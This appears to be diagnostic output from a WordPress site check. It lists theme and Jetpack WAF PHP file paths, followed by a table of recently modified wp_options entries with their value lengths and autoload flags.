./wp-content/themes/twentyfourteen/taxonomy-post_format.php
./wp-content/themes/twentyfourteen/content-aside.php
./wp-content/themes/twentyfourteen/sidebar-footer.php
./wp-content/themes/twentyfourteen/content-link.php
./wp-content/themes/twentyfourteen/archive.php
./wp-content/themes/twentyfourteen/content-gallery.php
./wp-content/themes/twentyfourteen/page-templates/contributors.php
./wp-content/themes/twentyfourteen/page-templates/full-width.php
./wp-content/themes/twentyfourteen/content-quote.php
./wp-content/themes/twentytwenty/templates/template-cover.php
./wp-content/themes/twentytwenty/templates/template-full-width.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php
./wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php
./wp-content/themes/twentytwenty/functions.php
./wp-content/themes/twentytwenty/404.php
./wp-content/themes/twentytwenty/header.php
./wp-content/themes/twentytwenty/footer.php
./wp-content/themes/twentytwenty/singular.php
./wp-content/themes/twentytwenty/comments.php
./wp-content/themes/twentytwenty/inc/block-patterns.php
./wp-content/themes/twentytwenty/inc/starter-content.php
./wp-content/themes/twentytwenty/inc/custom-css.php
./wp-content/themes/twentytwenty/inc/svg-icons.php
./wp-content/themes/twentytwenty/inc/template-tags.php
./wp-content/themes/twentytwenty/searchform.php
./wp-content/themes/twentytwenty/index.php
./wp-content/themes/twentytwenty/template-parts/navigation.php
./wp-content/themes/twentytwenty/template-parts/content-cover.php
./wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php
./wp-content/themes/twentytwenty/template-parts/pagination.php
./wp-content/themes/twentytwenty/template-parts/featured-image.php
./wp-content/themes/twentytwenty/template-parts/entry-author-bio.php
./wp-content/themes/twentytwenty/template-parts/content.php
./wp-content/themes/twentytwenty/template-parts/modal-search.php
./wp-content/themes/twentytwenty/template-parts/modal-menu.php
./wp-content/themes/twentytwenty/template-parts/entry-header.php
./wp-content/themes/twentytwentyfour/functions.php
./wp-content/themes/twentytwentyfour/patterns/template-home-business.php
./wp-content/themes/twentytwentyfour/patterns/hidden-no-results.php
./wp-content/themes/twentytwentyfour/patterns/text-project-details.php
./wp-content/themes/twentytwentyfour/patterns/hidden-post-navigation.php
./wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php
./wp-content/themes/twentytwentyfour/patterns/posts-1-col.php
./wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php
./wp-content/themes/twentytwentyfour/patterns/posts-grid-2-col.php
./wp-content/themes/twentytwentyfour/patterns/hidden-comments.php
./wp-content/themes/twentytwentyfour/patterns/posts-images-only-offset-4-col.php
./wp-content/themes/twentytwentyfour/patterns/footer.php
./wp-content/themes/twentytwentyfour/patterns/template-home-blogging.php
./wp-content/themes/twentytwentyfour/patterns/cta-content-image-on-right.php
./wp-content/themes/twentytwentyfour/patterns/gallery-full-screen-image.php
./wp-content/themes/twentytwentyfour/patterns/footer-centered-logo-nav.php
./wp-content/themes/twentytwentyfour/patterns/template-index-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/testimonial-centered.php
./wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php
./wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php
./wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-3-col.php
./wp-content/themes/twentytwentyfour/patterns/hidden-404.php
./wp-content/themes/twentytwentyfour/patterns/template-home-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/page-home-business.php
./wp-content/themes/twentytwentyfour/patterns/team-4-col.php
./wp-content/themes/twentytwentyfour/patterns/template-search-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/template-single-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/template-archive-blogging.php
./wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php
./wp-content/themes/twentytwentyfour/patterns/page-portfolio-overview.php
./wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php
./wp-content/themes/twentytwentyfour/patterns/posts-list.php
./wp-content/themes/twentytwentyfour/patterns/text-faq.php
./wp-content/themes/twentytwentyfour/patterns/banner-project-description.php
./wp-content/themes/twentytwentyfour/patterns/posts-images-only-3-col.php
./wp-content/themes/twentytwentyfour/patterns/page-home-portfolio-gallery.php
./wp-content/themes/twentytwentyfour/patterns/hidden-posts-heading.php
./wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php
./wp-content/themes/twentytwentyfour/patterns/hidden-search.php
./wp-content/themes/twentytwentyfour/patterns/text-title-left-image-right.php
./wp-content/themes/twentytwentyfour/patterns/template-index-blogging.php
./wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php
./wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php
./wp-content/themes/twentytwentyfour/patterns/hidden-sidebar.php
./wp-content/themes/twentytwentyfour/patterns/gallery-project-layout.php
./wp-content/themes/twentytwentyfour/patterns/cta-pricing.php
./wp-content/themes/twentytwentyfour/patterns/footer-colophon-3-col.php
./wp-content/themes/twentytwentyfour/patterns/posts-3-col.php
./wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php
./wp-content/themes/twentytwentyfour/patterns/page-about-business.php
./wp-content/themes/twentytwentyfour/patterns/template-search-blogging.php
./wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php
./wp-content/themes/twentytwentyfour/patterns/page-rsvp-landing.php
./wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php
./wp-content/themes/twentytwentyfour/patterns/banner-hero.php
./wp-content/themes/twentytwentyfour/patterns/template-archive-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/page-home-portfolio.php
./wp-content/themes/twentytwentyfour/patterns/text-alternating-images.php
./wp-content/themes/hello-elementor/theme.php
./wp-content/themes/hello-elementor/functions.php
./wp-content/themes/hello-elementor/header.php
./wp-content/themes/hello-elementor/footer.php
./wp-content/themes/hello-elementor/vendor/elementor/wp-notifications-package/src/V120/Notifications.php
./wp-content/themes/hello-elementor/vendor/elementor/wp-notifications-package/plugin-example.php
./wp-content/themes/hello-elementor/vendor/autoload.php
./wp-content/themes/hello-elementor/vendor/composer/ClassLoader.php
./wp-content/themes/hello-elementor/vendor/composer/installed.php
./wp-content/themes/hello-elementor/vendor/composer/autoload_namespaces.php
./wp-content/themes/hello-elementor/vendor/composer/autoload_classmap.php
./wp-content/themes/hello-elementor/vendor/composer/InstalledVersions.php
./wp-content/themes/hello-elementor/vendor/composer/autoload_real.php
./wp-content/themes/hello-elementor/vendor/composer/autoload_static.php
./wp-content/themes/hello-elementor/vendor/composer/autoload_psr4.php
./wp-content/themes/hello-elementor/modules/admin-home/components/ajax-handler.php
./wp-content/themes/hello-elementor/modules/admin-home/components/api-controller.php
./wp-content/themes/hello-elementor/modules/admin-home/components/admin-top-bar.php
./wp-content/themes/hello-elementor/modules/admin-home/components/notificator.php
./wp-content/themes/hello-elementor/modules/admin-home/components/conversion-banner.php
./wp-content/themes/hello-elementor/modules/admin-home/components/scripts-controller.php
./wp-content/themes/hello-elementor/modules/admin-home/components/settings-controller.php
./wp-content/themes/hello-elementor/modules/admin-home/components/finder.php
./wp-content/themes/hello-elementor/modules/admin-home/components/admin-menu-controller.php
./wp-content/themes/hello-elementor/modules/admin-home/rest/promotions.php
./wp-content/themes/hello-elementor/modules/admin-home/rest/rest-base.php
./wp-content/themes/hello-elementor/modules/admin-home/rest/admin-config.php
./wp-content/themes/hello-elementor/modules/admin-home/rest/whats-new.php
./wp-content/themes/hello-elementor/modules/admin-home/rest/theme-settings.php
./wp-content/themes/hello-elementor/modules/admin-home/module.php
./wp-content/themes/hello-elementor/sidebar.php
./wp-content/themes/hello-elementor/includes/settings/settings-header.php
./wp-content/themes/hello-elementor/includes/settings/settings-footer.php
./wp-content/themes/hello-elementor/includes/customizer-functions.php
./wp-content/themes/hello-elementor/includes/settings-functions.php
./wp-content/themes/hello-elementor/includes/customizer/customizer-upsell.php
./wp-content/themes/hello-elementor/includes/customizer/customizer-action-links.php
./wp-content/themes/hello-elementor/includes/script.php
./wp-content/themes/hello-elementor/includes/utils.php
./wp-content/themes/hello-elementor/includes/module-base.php
./wp-content/themes/hello-elementor/includes/elementor-functions.php
./wp-content/themes/hello-elementor/comments.php
./wp-content/themes/hello-elementor/index.php
./wp-content/themes/hello-elementor/assets/js/hello-elementor-topbar.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-elementor-settings.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-elementor-menu.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-conversion-banner.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-home-app.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-editor.asset.php
./wp-content/themes/hello-elementor/assets/js/hello-frontend.asset.php
./wp-content/themes/hello-elementor/assets/css/reset.asset.php
./wp-content/themes/hello-elementor/assets/css/customizer.asset.php
./wp-content/themes/hello-elementor/assets/css/theme.asset.php
./wp-content/themes/hello-elementor/assets/css/header-footer.asset.php
./wp-content/themes/hello-elementor/assets/css/editor.asset.php
./wp-content/themes/hello-elementor/assets/css/editor-styles.asset.php
./wp-content/themes/hello-elementor/template-parts/single.php
./wp-content/themes/hello-elementor/template-parts/dynamic-header.php
./wp-content/themes/hello-elementor/template-parts/search.php
./wp-content/themes/hello-elementor/template-parts/404.php
./wp-content/themes/hello-elementor/template-parts/header.php
./wp-content/themes/hello-elementor/template-parts/footer.php
./wp-content/themes/hello-elementor/template-parts/dynamic-footer.php
./wp-content/themes/hello-elementor/template-parts/archive.php
./wp-content/themes/twentyten/page.php
./wp-content/themes/twentyten/single.php
./wp-content/themes/twentyten/search.php
./wp-content/themes/twentyten/functions.php
./wp-content/themes/twentyten/loop-page.php
./wp-content/themes/twentyten/404.php
./wp-content/themes/twentyten/header.php
./wp-content/themes/twentyten/footer.php
./wp-content/themes/twentyten/tag.php
./wp-content/themes/twentyten/block-patterns.php
./wp-content/themes/twentyten/attachment.php
./wp-content/themes/twentyten/sidebar.php
./wp-content/themes/twentyten/author.php
./wp-content/themes/twentyten/category.php
./wp-content/themes/twentyten/onecolumn-page.php
./wp-content/themes/twentyten/comments.php
./wp-content/themes/twentyten/loop.php
./wp-content/themes/twentyten/index.php
./wp-content/themes/twentyten/loop-attachment.php
./wp-content/themes/twentyten/sidebar-footer.php
./wp-content/themes/twentyten/loop-single.php
./wp-content/themes/twentyten/archive.php
./wp-content/themes/twentytwentytwo/functions.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-image-with-caption.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-social-copyright.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-gray-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-simple-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-logo.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-simple-blog.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-large-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-image-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-irregular-grid.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation-copyright.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-title-tagline-social.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-text-grid.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-salmon-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-stacked.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts-right.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo-black-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-about-title-logo.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-grid-posts.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-pricing-table.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-image-background-overlay.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-with-tagline-black-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-text-and-video.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-small-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-image-grid.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-two-images-text.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-title-and-button.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-default.php
./wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-blog.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-default.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-links-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/hidden-heading-and-bird.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-social-black-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-default.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-dark.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-left.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-layout-two-columns.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-poster.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-query-images-title-citation.php
./wp-content/themes/twentytwentytwo/inc/patterns/footer-query-title-citation.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-layered-images-with-duotone.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-featured-posts.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-subscribe.php
./wp-content/themes/twentytwentytwo/inc/patterns/hidden-bird.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-large-list-names.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-with-tagline.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-wide-image-intro-buttons.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-links.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-and-text.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-title-navigation-social.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-video-trailer.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-grid.php
./wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-green-background.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-list-events.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-centered-logo.php
./wp-content/themes/twentytwentytwo/inc/patterns/header-centered-title-navigation-social.php
./wp-content/themes/twentytwentytwo/inc/patterns/general-video-header-details.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php
./wp-content/themes/twentytwentytwo/inc/patterns/page-about-solid-color.php
./wp-content/themes/twentytwentytwo/inc/block-patterns.php
./wp-content/themes/twentytwentytwo/index.php
./wp-content/jetpack-waf/rules/automatic-rules.php
./wp-content/jetpack-waf/rules/block-ip.php
./wp-content/jetpack-waf/rules/allow-ip.php
./wp-content/jetpack-waf/rules/rules.php
./wp-content/jetpack-waf/bootstrap.php

=== check for newly modified options ===
option_name	LENGTH(option_value)	autoload
jetpack_file_data	60837	yes
jetpack_active_plan	15519	yes
rewrite_rules	8494	yes
jetpack_options	6158	yes
wp_user_roles	4046	yes
ngg_options	3712	yes
youtubeprefs_alloptions	2960	yes
bib_meta_keys	2867	yes
youtubeprefs_alloptions_backup_11_5	1784	yes
youtubeprefs_alloptions_backup_11_8_1	1680	yes
youtubeprefs_alloptions_backup_11_8_2	1680	yes
youtubeprefs_alloptions_backup_11_8_3	1680	yes
tc_theme_options	1621	yes
sm_options	1578	yes
oa_social_login_settings	1544	yes
user_hit_count	1443	yes
toc-options	1422	yes
jetpack_available_modules	1287	yes
widget_rss_multi_importer_widget	1117	yes
widget_aboutme_widget	1028	yes
